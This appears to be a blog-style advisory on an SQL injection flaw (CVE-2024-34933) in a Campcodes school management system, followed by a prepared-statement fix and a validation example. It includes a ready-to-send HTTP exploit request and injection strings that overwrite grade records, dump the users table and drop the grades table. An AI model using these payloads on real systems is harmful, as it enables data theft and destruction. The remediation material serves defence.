A critical SQL injection vulnerability (CVE-2024-34933) in Campcodes Complete Web-Based School Management System 1. lets attackers run harmful SQL commands. The problem is in the update_grade.php file, where user input isn’t checked before being added to a database query. This could let hackers steal data, bypass logins, or even destroy the database. Let’s dive in with examples and show you how it works — and how to fix it.

What is CVE-2024-34933?

CVE-2024-34933 is a security flaw found in Campcodes’ popular school management web application. If an attacker messes with the admission_fee parameter when updating student grades, they can make the software run unwanted SQL commands.

The Vulnerable PHP Code

Here’s a simple version of what the problem code probably looks like inside model/update_grade.php:

// Vulnerable code in update_grade.php
$admission_fee = $_POST['admission_fee'];
$grade_id = $_POST['grade_id'];

// NO validation or sanitization on $admission_fee!
$query = "UPDATE grades SET admission_fee = '$admission_fee' WHERE grade_id = $grade_id";
mysqli_query($conn, $query);

Notice the values from the user (especially admission_fee) are put straight into the SQL query — no checks or cleaning.

Suppose a web form posts to update_grade.php. An attacker could send this:

POST /model/update_grade.php HTTP/1.1
Host: victim-school.com
Content-Type: application/x-www-form-urlencoded

grade_id=1&admission_fee=100', grade_name='Hacked', is_active=1-- 

The resulting SQL query is:

UPDATE grades SET admission_fee = '100', grade_name='Hacked', is_active=1-- ' WHERE grade_id = 1

Everything after -- is ignored, including the WHERE clause, so the query sets the grade’s name and other fields that were never meant to be set by the user, and it does so on every row of the table rather than only on grade 1.

If the attacker is clever, they could dump other data:

admission_fee='; SELECT * FROM users WHERE '1'='1

Or even delete information:

admission_fee='; DROP TABLE grades;--

- Original script by Campcodes: https://www.campcodes.com/scripts/php/complete-web-based-school-management-system/
- Exploit DB Reference: https://www.exploit-db.com/exploits/52722
- Public Vulnerability listing: https://nvd.nist.gov/vuln/detail/CVE-2024-34933
- More on SQL Injection: OWASP SQL Injection

How to Fix It: The Secure Way

Never trust user input. Validate every value and pass it to the database as a bound parameter instead of concatenating it into the query string.

Use Prepared Statements (Safe Way)

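// Secure code for update_grade.php
$admission_fee = $_POST['admission_fee'];
$grade_id = $_POST['grade_id'];

// The query text is fixed; the ? placeholders are filled in separately,
// so user input is never parsed as SQL.
$stmt = $conn->prepare("UPDATE grades SET admission_fee = ? WHERE grade_id = ?");
// "d" binds admission_fee as a double, "i" binds grade_id as an integer.
$stmt->bind_param("di", $admission_fee, $grade_id);
$stmt->execute();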
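
A fuller form of the fix, as an added example that is not Campcodes' code or part of the original write-up: it rejects malformed values before the bound statement runs. The helper names and the numeric limits are assumptions; the table and column names come from the simplified query above.

```php
<?php
declare(strict_types=1);
// Added example (PHP 8+), not Campcodes code. Table and column names follow the
// article's simplified query; helper names and the fee limit are assumptions.

/** Fee as a float, or null unless it is a plain non-negative decimal. */
function parse_admission_fee(mixed $raw): ?float
{
    // Allow-list: up to 7 digits and an optional 1-2 digit fraction, nothing else.
    if (!is_string($raw) || preg_match('/\A\d{1,7}(\.\d{1,2})?\z/', $raw) !== 1) {
        return null;
    }
    return (float) $raw;
}

/** Grade id as a positive int, or null for anything else. */
function parse_grade_id(mixed $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Validate, then update via a bound statement. Rows changed, or null on bad input. */
function update_admission_fee(mysqli $conn, array $post): ?int
{
    $fee = parse_admission_fee($post['admission_fee'] ?? null);
    $id  = parse_grade_id($post['grade_id'] ?? null);
    if ($fee === null || $id === null) {
        return null; // caller answers HTTP 400; the database is never touched
    }
    // Throw on database errors instead of failing silently.
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    $stmt = $conn->prepare('UPDATE grades SET admission_fee = ? WHERE grade_id = ?');
    $stmt->bind_param('di', $fee, $id);
    $stmt->execute();
    return (int) $stmt->affected_rows;
}

// Constructed inputs: one normal value and the payload shape shown earlier.
$samples = ['100.50', "100', grade_name='Hacked', is_active=1-- "];
foreach ($samples as $s) {
    printf("%-45s => %s\n", json_encode($s), var_export(parse_admission_fee($s), true));
}
```

The loop at the bottom needs no database: it only shows which of the two inputs passes validation.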

Final Words

Security is a must, especially for systems handling private school and student data. If you run Campcodes’ School Management System — or any similar PHP web tool — check your code now and patch any issues. Share this with your colleagues, and stay safe!



Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 07/03/2024 02:00:58 UTC